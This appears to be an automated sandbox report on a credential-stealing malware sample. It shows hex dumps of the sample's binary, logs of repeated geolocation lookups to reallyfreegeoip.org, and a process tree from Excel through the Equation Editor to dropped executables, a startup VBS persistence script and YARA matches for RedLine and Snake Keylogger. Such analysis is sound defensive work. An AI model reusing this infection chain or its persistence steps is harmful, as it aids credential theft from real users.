2024-05-04 08:09:31 UTC	16384	IN	Data Raw: 00 00 00 8b 75 10 8b 5d d0 83 be 8c 00 00 00 00 0f 85 9b f7 03 00 8b 55 f8 83 c3 02 89 5d d0 e9 9c fd ff ff 0f b7 53 22 8d 43 02 83 c3 22 89 45 f4 8b ca 89 5d d0 83 f9 6d 0f 86 e6 f9 03 00 ba 01 00 00 00 c7 45 e0 01 00 00 00 89 55 e8 83 7d d8 00 b9 01 00 00 00 89 4d dc 0f 84 93 fa 03 00 3b d1 7c 5c 8b 45 f8 3b 46 7c 0f 83 aa 42 04 00 0f b7 10 83 c0 02 89 45 f8 8b c2 25 00 fc 00 00 3d 00 d8 00 00 0f 84 35 fa 03 00 81 fa ff 00 00 00 0f 87 4e fa 03 00 8b ca b8 01 00 00 00 83 e1 07 c1 ea 03 d3 e0 8b 4d f4 84 04 0a 0f 84 5a 04 00 00 8b 4d dc 8b 55 e8 41 89 4d dc 3b ca 7e a4 8b 45 f8 3b 55 e0 0f 85 89 fa 03 00 8b 55 f8 e9 ec fc ff ff 8d 34 53 89 4d cc 89 75 f8 8b de 8b fe 3b f0 0f 82 ba fe ff ff e9 15 ff ff ff 8b 45 f8 3b 46 7c 0f 83 20 42 04 00 83 7d d8 00 0f Data Ascii: u]U]S"C"E]mEU}M;\|\E;F\|BE%=5NMZMUAM;~E;UU4SMu;E;F\| B}
2024-05-04 08:09:31 UTC	16384	IN	Data Raw: 0f 84 43 fe ff ff 8b 01 6a 01 ff 10 e9 38 fe ff ff 8b ff fa c9 40 00 f6 c8 40 00 f6 c8 40 00 39 0a 45 00 f6 c8 40 00 87 ca 40 00 53 0a 45 00 69 0a 45 00 7e 0a 45 00 7e 0a 45 00 a9 ca 40 00 cc cc cc cc 55 8b ec 83 ec 64 53 56 57 8b 7d 0c 33 db 89 5d e0 89 5d e8 c7 45 ec 01 00 00 00 8b 07 48 89 5d d0 89 45 a4 8b 45 08 89 5d d8 c7 45 dc 01 00 00 00 89 4d f8 8b 40 04 c7 45 b0 00 00 00 00 c7 45 b8 00 00 00 00 c7 45 bc 01 00 00 00 8b 40 04 c7 45 c0 00 00 00 00 c7 45 c8 00 00 00 00 c7 45 cc 01 00 00 00 66 83 78 08 33 89 5d f4 c7 45 a0 03 00 00 00 0f 85 2d 3f 04 00 be 02 00 00 00 8b 08 89 4d f0 89 75 fc 39 1d 80 23 4d 00 0f 84 f1 03 00 00 32 c0 84 c0 0f 85 ee 03 00 00 a1 84 23 4d 00 38 1d 89 23 4d 00 0f 85 00 3f 04 00 50 51 89 45 0c e8 39 f0 ff ff 84 c0 0f 84 a2 Data Ascii: Cj8@@@9E@@SEiE~E~E@UdSVW}3]]EH]EE]EM@EEE@EEEfx3]E-?Mu9#M2#M8#M?PQE9
2024-05-04 08:09:31 UTC	16384	IN	Data Raw: f9 02 0f 84 ea 04 00 00 80 7f 0d 00 8b 47 08 8b 70 10 0f 85 cb 02 00 00 8b 4e 0c 8b c1 83 f8 03 0f 85 04 02 00 00 8b cb e8 db ab ff ff dc 3e dd 1e 8b 4e 08 85 c9 0f 84 84 fc ff ff e9 61 51 04 00 83 f8 01 0f 85 c3 04 00 00 8b 4e 0c 3b c8 0f 84 50 02 00 00 83 f9 02 0f 84 53 4e 04 00 83 f8 03 74 1d 8b cb e8 9e ab ff ff 8b cb dd 5d f8 e8 7f c4 ff ff dd 45 f8 dd 1b c7 43 0c 03 00 00 00 8b ce e8 81 ab ff ff e9 28 fe ff ff e8 29 aa ff ff 8b cb 8b f0 e8 20 aa ff ff 3b f0 0f 8d aa fd ff ff 83 7f 04 02 0f 85 88 55 04 00 8b 37 8b ce e8 3e c4 ff ff c6 06 01 e9 c6 fc ff ff 80 7f 0d 00 8b 47 08 8b 58 10 0f 84 6f fe ff ff 8b 5b 10 e9 67 fe ff ff 49 83 f9 09 0f 87 72 52 04 00 ff 24 8d f0 11 41 00 db 03 dd 55 f8 e9 4b fc ff ff 83 f9 01 0f 84 dc 50 04 00 80 7f 0d 00 8b 5f Data Ascii: GpN>NaQN;PSNt]EC() ;U7>GXo[gIrR$AUKP_
2024-05-04 08:09:31 UTC	16384	IN	Data Raw: 4c 00 72 ac 47 00 c7 05 18 e3 4c 00 00 00 00 00 c7 05 1c e3 4c 00 00 00 00 00 c7 05 20 e3 4c 00 00 00 00 00 c7 05 24 e3 4c 00 01 00 00 00 66 c7 05 28 e3 4c 00 00 00 c7 05 2c e3 4c 00 4c dc 49 00 c7 05 38 e3 4c 00 ae ac 47 00 c7 05 3c e3 4c 00 00 00 00 00 c7 05 40 e3 4c 00 00 00 00 00 c7 05 44 e3 4c 00 00 00 00 00 c7 05 48 e3 4c 00 01 00 00 00 66 c7 05 4c e3 4c 00 00 00 c7 05 50 e3 4c 00 08 f3 49 00 c7 05 5c e3 4c 00 0c ae 47 00 c7 05 60 e3 4c 00 00 00 00 00 c7 05 64 e3 4c 00 00 00 00 00 c7 05 68 e3 4c 00 00 00 00 00 c7 05 6c e3 4c 00 01 00 00 00 66 c7 05 70 e3 4c 00 00 00 c7 05 74 e3 4c 00 d0 ea 49 00 c7 05 80 e3 4c 00 c2 b0 47 00 c7 05 84 e3 4c 00 00 00 00 00 c7 05 88 e3 4c 00 00 00 00 00 c7 05 8c e3 4c 00 00 00 00 00 c7 05 90 e3 4c 00 01 00 00 00 66 c7 Data Ascii: LrGLL L$Lf(L,LLI8LG<L@LDLHLfLLPLI\LG`LdLhLlLfpLtLILGLLLLf
2024-05-04 08:09:31 UTC	16384	IN	Data Raw: 00 a3 d4 18 4d 00 ff 05 d0 18 4d 00 b9 b0 18 4d 00 6a 00 89 35 1c 19 4d 00 e8 15 00 00 00 f7 c7 00 00 00 10 0f 85 40 dd 03 00 8b 03 5f 5e 5b c9 c2 20 00 55 8b ec 83 7d 08 00 56 8b f1 0f 85 41 dd 03 00 8b 4e 6c 8b 46 60 5e 8b 04 88 8b 00 66 c7 40 68 00 00 5d c2 04 00 55 8b ec 51 51 83 7d 18 00 0f 85 2c dd 03 00 8b 0d 1c 19 4d 00 83 f9 ff 74 76 83 7d 08 00 0f 85 31 dd 03 00 a1 10 19 4d 00 33 d2 56 57 8b 7d 10 42 8b 04 88 89 55 08 8b 30 8b 06 89 45 f8 85 ff 0f 85 2f dd 03 00 8b fa 83 7d 0c ff 74 20 8d 4d 0c e8 7c 10 00 00 83 7e 4c 00 0f 8d eb dd 03 00 8b 45 0c 6a 01 50 89 46 4c e8 8c 0b 00 00 8b 45 1c 83 f8 ff 75 1e 8b 45 20 83 f8 ff 75 1b 80 7e 38 00 0f 85 d0 dd 03 00 8b c7 5f 5e c9 c2 1c 00 33 c0 eb f8 89 46 50 eb dd 89 46 54 eb e0 55 8b ec ff 75 08 b9 b0 Data Ascii: MMMj5M@_^[ U}VANlF`^f@h]UQQ},Mtv}1M3VW}BU0E/}t M\|~LEjPFLEuE u~8_^3FPFTUu
2024-05-04 08:09:31 UTC	16384	IN	Data Raw: 27 0f 84 d8 f2 03 00 33 c9 89 4d c8 c7 45 f8 e8 03 00 00 85 c0 74 20 8d 4d f8 8b d3 51 50 8d 4d c4 51 ff 75 08 8b c8 e8 60 01 00 00 83 c4 10 85 c0 0f 85 b0 f2 03 00 0f b7 06 89 45 fc 66 8b 7d fc 6a 70 58 e9 da fe ff ff 8b c1 2d 95 00 00 00 0f 84 47 f3 03 00 48 83 e8 01 0f 84 3d f3 03 00 48 83 e8 01 0f 84 33 f3 03 00 48 83 e8 01 0f 85 df fe ff ff e9 24 f3 03 00 66 3b f8 74 56 6a 22 5f 0f b7 1c 37 89 5d fc 8d 43 9e 66 3b c2 0f 86 94 f2 03 00 8b 5d f4 eb 9e 83 f9 5a 0f 87 b1 fe ff ff 0f b7 46 02 66 3b 45 f0 74 0a 66 3b 45 ec 0f 85 9d fe ff ff 83 c6 04 e9 95 fe ff ff 83 f9 60 76 df 6a 61 58 3b c8 0f 85 85 fe ff ff 0f b7 46 04 eb d2 0f b7 7e 02 03 ff eb a5 55 8b ec 83 ec 30 8b c1 89 55 d0 8b 55 10 53 56 8b 08 81 e2 00 08 00 00 33 db 89 45 d4 57 89 55 fc 0f b7 Data Ascii: '3MEt MQPMQu`Ef}jpX-GH=H3H$f;tVj"_7]Cf;]ZFf;Etf;E`vjaX;F~U0UUSV3EWU
2024-05-04 08:09:31 UTC	16384	IN	Data Raw: 00 50 ff 15 70 c3 49 00 8b 45 f8 33 45 f4 89 45 fc ff 15 80 c1 49 00 31 45 fc ff 15 10 c3 49 00 31 45 fc 8d 45 ec 50 ff 15 bc c1 49 00 8b 45 f0 8d 4d fc 33 45 ec 33 45 fc 33 c1 c9 c3 8b 0d 14 c0 4c 00 56 57 bf 4e e6 40 bb be 00 00 ff ff 3b cf 74 04 85 ce 75 26 e8 94 ff ff ff 8b c8 3b cf 75 07 b9 4f e6 40 bb eb 0e 85 ce 75 0a 0d 11 47 00 00 c1 e0 10 0b c8 89 0d 14 c0 4c 00 f7 d1 5f 89 0d 10 c0 4c 00 5e c3 b8 00 40 00 00 c3 68 48 07 4d 00 ff 15 74 c3 49 00 c3 b0 01 c3 68 00 00 03 00 68 00 00 01 00 6a 00 e8 68 1a 01 00 83 c4 0c 85 c0 75 01 c3 6a 07 e8 d5 fc ff ff cc b8 50 07 4d 00 c3 e8 4b ea ff ff 8b 48 04 83 08 04 89 48 04 e8 e7 ff ff ff 8b 48 04 83 08 02 89 48 04 c3 33 c0 39 05 18 c0 4c 00 0f 94 c0 c3 b8 24 13 4d 00 c3 b8 20 13 4d 00 c3 53 56 be 70 86 4c Data Ascii: PpIE3EEI1EI1EEPIEM3E3E3LVWN@;tu&;uO@uGL_L^@hHMtIhhjhujPMKHHHH39L$M MSVpL
2024-05-04 08:09:31 UTC	16384	IN	Data Raw: ff 75 0c ff 75 08 e8 05 00 00 00 83 c4 0c 5d c3 8b ff 55 8b ec 83 ec 10 8d 4d f0 53 56 ff 75 10 e8 d3 fe ff ff 8b 5d 08 85 db 74 07 8b 75 0c 85 f6 75 1a e8 f4 a7 00 00 c7 00 16 00 00 00 e8 fc dc 00 00 ba ff ff ff 7f e9 8b 00 00 00 8b 45 f4 57 83 b8 a8 00 00 00 00 75 42 6a 41 59 6a 5a 2b de 5a 0f b7 04 33 66 3b c1 72 0d 66 3b c2 77 08 83 c0 20 0f b7 f8 eb 02 8b f8 0f b7 06 66 3b c1 72 0b 66 3b c2 77 06 83 c0 20 0f b7 c0 83 c6 02 66 85 ff 74 3a 66 3b f8 74 c8 eb 33 0f b7 03 8d 4d f4 51 50 e8 9c 92 00 00 8d 4d f4 0f b7 f8 0f b7 06 8d 5b 02 51 50 e8 89 92 00 00 83 c4 10 0f b7 c0 8d 76 02 66 85 ff 74 05 66 3b f8 74 cd 0f b7 d7 0f b7 c0 2b d0 5f 80 7d fc 00 5e 5b 74 0a 8b 4d f0 83 a1 50 03 00 00 fd 8b c2 8b e5 5d c3 8b ff 55 8b ec a1 14 c0 4c 00 83 e0 1f 6a 20 Data Ascii: uu]UMSVu]tuuEWuBjAYjZ+Z3f;rf;w f;rf;w ft:f;t3MQPM[QPvftf;t+_}^[tMP]ULj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49166	172.67.177.134	443	1304	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 08:12:06 UTC	86	OUT	GET /xml/81.181.54.104 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-04 08:12:07 UTC	699	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 08:12:07 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: MISS Last-Modified: Sat, 04 May 2024 08:12:07 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TKo4rZw%2FXmpnytayq1iWdk2fALOG3YJqgBf9bxy7uIxbV7%2Bsxogmn%2BQ1mG%2FRto6FWwD3wqfKmwuEIhJseZx3703d4M6p8zceZqFXEgDihwZQoOqTizKAdyijrTA%2Bxeb26Legbh77"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e706200c110ff4-LAX alt-svc: h3=":443"; ma=86400
2024-05-04 08:12:07 UTC	337	IN	Data Raw: 31 34 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 52 4f 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 52 6f 6d 61 6e 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 42 75 63 68 61 72 65 73 74 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 34 35 2e 39 39 36 38 3c Data Ascii: 14a<Response><IP>81.181.54.104</IP><CountryCode>RO</CountryCode><CountryName>Romania</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Bucharest</TimeZone><Latitude>45.9968<
2024-05-04 08:12:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49167	172.67.177.134	443	1304	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 08:12:07 UTC	62	OUT	GET /xml/81.181.54.104 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-04 08:12:08 UTC	702	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 08:12:08 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 1 Last-Modified: Sat, 04 May 2024 08:12:07 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kM0vQqR0NQO5vMbV2jqj165Rus8GJHnaIwARqIFiLuXdU2mVQyQxqLudryczw6RNEHMPfiyzBSYphj16KDJjycuKiO%2BDr4vp9mx%2F4s0a0TooZzEtOXqc5IVdV1cZ%2FiLojxIZ2udI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e706274a4e7d23-LAX alt-svc: h3=":443"; ma=86400
2024-05-04 08:12:08 UTC	337	IN	Data Raw: 31 34 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 52 4f 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 52 6f 6d 61 6e 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 42 75 63 68 61 72 65 73 74 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 34 35 2e 39 39 36 38 3c Data Ascii: 14a<Response><IP>81.181.54.104</IP><CountryCode>RO</CountryCode><CountryName>Romania</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Bucharest</TimeZone><Latitude>45.9968<
2024-05-04 08:12:08 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49169	104.21.67.152	443	2160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 08:12:20 UTC	86	OUT	GET /xml/81.181.54.104 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-05-04 08:12:21 UTC	701	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 08:12:21 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 14 Last-Modified: Sat, 04 May 2024 08:12:07 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vOQ5LgJ10oe5dRIUi1EqVjpL9O2YBmDef07QLmB7qW9v9T%2BZTKpDDVVDuuwbBrktr7f4sBKNKtn60kymwXKXXm%2FQQ4jipAHGQMhxmeJIXvRjQASSupUBP3gAzZlQ3Yjqmb8ub9R8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e70678588d0fd3-LAX alt-svc: h3=":443"; ma=86400
2024-05-04 08:12:21 UTC	337	IN	Data Raw: 31 34 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 52 4f 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 52 6f 6d 61 6e 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 42 75 63 68 61 72 65 73 74 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 34 35 2e 39 39 36 38 3c Data Ascii: 14a<Response><IP>81.181.54.104</IP><CountryCode>RO</CountryCode><CountryName>Romania</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Bucharest</TimeZone><Latitude>45.9968<
2024-05-04 08:12:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49170	104.21.67.152	443	2160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-04 08:12:24 UTC	62	OUT	GET /xml/81.181.54.104 HTTP/1.1 Host: reallyfreegeoip.org
2024-05-04 08:12:24 UTC	707	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 08:12:24 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 17 Last-Modified: Sat, 04 May 2024 08:12:07 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n9MBAlvXDJP582l23g6vfbcpqbp8O%2B8bj8i4YqbZ%2B1O7ZIL5ppnF40FAbciOd4KKoH%2BplzLctXqGMjlEIt0Es%2BxnLbPZDF2h6xfz5MDFooK%2BmQ1tLVIIdoar1H4DJxmUKrDTQCYY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87e7068cee657ba7-LAX alt-svc: h3=":443"; ma=86400
2024-05-04 08:12:24 UTC	337	IN	Data Raw: 31 34 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 52 4f 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 52 6f 6d 61 6e 69 61 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 42 75 63 68 61 72 65 73 74 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 34 35 2e 39 39 36 38 3c Data Ascii: 14a<Response><IP>81.181.54.104</IP><CountryCode>RO</CountryCode><CountryName>Romania</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>Europe/Bucharest</TimeZone><Latitude>45.9968<
2024-05-04 08:12:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	10:08:38
Start date:	04/05/2024
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Imagebase:	0x13faa0000
File size:	28'253'536 bytes
MD5 hash:	D53B85E21886D2AF9815C377537BCAC3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	10:09:26
Start date:	04/05/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:09:32
Start date:	04/05/2024
Path:	C:\Users\user\AppData\Roaming\negrett.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\negrett.exe
Imagebase:	0xb10000
File size:	1'357'312 bytes
MD5 hash:	FBCCDD35EE6DCCADAEAA69E37FBBD171
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:11:58
Start date:	04/05/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\negrett.exe
Imagebase:	0xff0000
File size:	109'360'640 bytes
MD5 hash:	CF439A4CF698F8D15901A3CAA5F503FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:11:59
Start date:	04/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\negrett.exe
Imagebase:	0xe30000
File size:	45'248 bytes
MD5 hash:	19855C0DC5BEC9FDF925307C57F9F5FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.887505835.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: unknown Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	10:12:12
Start date:	04/05/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs"
Imagebase:	0xfff20000
File size:	168'960 bytes
MD5 hash:	045451FA238A75305CC26AC982472367
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:12:13
Start date:	04/05/2024
Path:	C:\Users\user\AppData\Local\directory\name.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0x1330000
File size:	109'360'640 bytes
MD5 hash:	CF439A4CF698F8D15901A3CAA5F503FE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:12:14
Start date:	04/05/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\directory\name.exe"
Imagebase:	0xe30000
File size:	45'248 bytes
MD5 hash:	19855C0DC5BEC9FDF925307C57F9F5FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
